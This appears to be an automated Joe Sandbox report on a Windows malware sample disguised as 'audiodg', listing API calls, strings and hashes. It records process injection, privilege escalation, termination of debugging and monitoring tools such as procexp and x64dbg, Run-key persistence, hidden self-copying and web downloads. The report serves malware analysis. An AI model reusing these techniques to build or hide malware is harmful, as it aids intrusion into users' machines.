                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
• Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581
                                                                                                                                                                                                                          • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction ID: dc5f13bdc9212b6b0fe7a79189c8ef7b10761548cafd4398b57341666d079bdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0332E732609AC186E772DF15F8547AAA3B2FB98B80F414535DA8E83B68DF3CD454CB10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
• Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                          • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction ID: 87a06f4f470b3f46ef5ab7b575e95d6d78648ed0744eb19a22ee51115dd25a02
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B416D3261DA8186E351EF55F44832EF7B1FB84754F918034EA8A86AA8CF7DD458CF10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
• Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                          • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction ID: ba24ea550f3a24acaccd85e293da3e45907fdd6a8fcc5c396d5574c61a4708af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2410032609A8586E7719F15F44436BB7B1F794B88F504429EA8C83B68CF7DD4588B40

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7A91B1D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
• Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                          • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction ID: e219a3160157b1090b1d65c3f7cc9d5a7552111c0384420d9c980f8dc31385ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7071F532619A8182E761AF50F49832AF7B1FBC4794F911035FA8E83A68CF7CD4548B20

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2693768547-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B460C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B4649
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B4654
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B311C), ref: 00007FF7A91B3BC7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3B84: RegSetValueExW.ADVAPI32 ref: 00007FF7A91B3BFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3B84: RegCloseKey.ADVAPI32 ref: 00007FF7A91B3C0C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7A91B3C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7A91B3E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: Process32FirstW.KERNEL32 ref: 00007FF7A91B3E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: wcscmp.MSVCRT ref: 00007FF7A91B3E91
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: OpenProcess.KERNEL32 ref: 00007FF7A91B3EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: TerminateProcess.KERNEL32 ref: 00007FF7A91B3ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: Process32NextW.KERNEL32 ref: 00007FF7A91B3EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3EFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7A91B3B0C), ref: 00007FF7A91B39E4
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF7A91B31C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 2853470409-928700279

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7A91B3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7A91B3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: wsprintfW.USER32 ref: 00007FF7A91B38A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 1846285901-4119554291

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7A91B3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7A91B3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: wsprintfW.USER32 ref: 00007FF7A91B38A2
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00007FF7A91B3AB9
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32 ref: 00007FF7A91B3AC4
                                                                                                                                                                                                                          • CopyFileW.KERNEL32 ref: 00007FF7A91B3ADD
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 00007FF7A91B3AF5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: Services
                                                                                                                                                                                                                          • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                          • API String ID: 779948276-85274793
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction ID: 90c57c7e59dd50902081632c618d515956165548fa47239b9bce09401bb7b93d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1511EC71A0DA8681E771AF25F4883BAA3B1FB84754F814235D69D82AF8DF3DD514CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                          • API String ID: 3001812590-640692576
                                                                                                                                                                                                                          • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction ID: a093925ed4b99e58a19b1d6d08544e5e862c317f23e236af5e32b69c2051a22c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C31072661D6C186DB31EF64F4983AAB3B1FB84700F900126E68DC3A68EF3DC519CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                          • API String ID: 779948276-1428018034
                                                                                                                                                                                                                          • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction ID: 8d2fc9674485078fbd4ebea5737b2aa6986aeae1e4b3022979fc7a64cac25062
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1115132529A4086D7919F24F44462AB7A1FB847A0F515330F9AE83BF8DF6CD055CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B46E4: CreateFileW.KERNEL32 ref: 00007FF7A91B472B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7A91B414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7A91B415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7A91B4186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7A91B41B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: CloseHandle.KERNEL32 ref: 00007FF7A91B41BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: OpenProcess.KERNEL32 ref: 00007FF7A91B41D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: CloseHandle.KERNEL32 ref: 00007FF7A91B4249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF7A91B3037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF7A91B304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
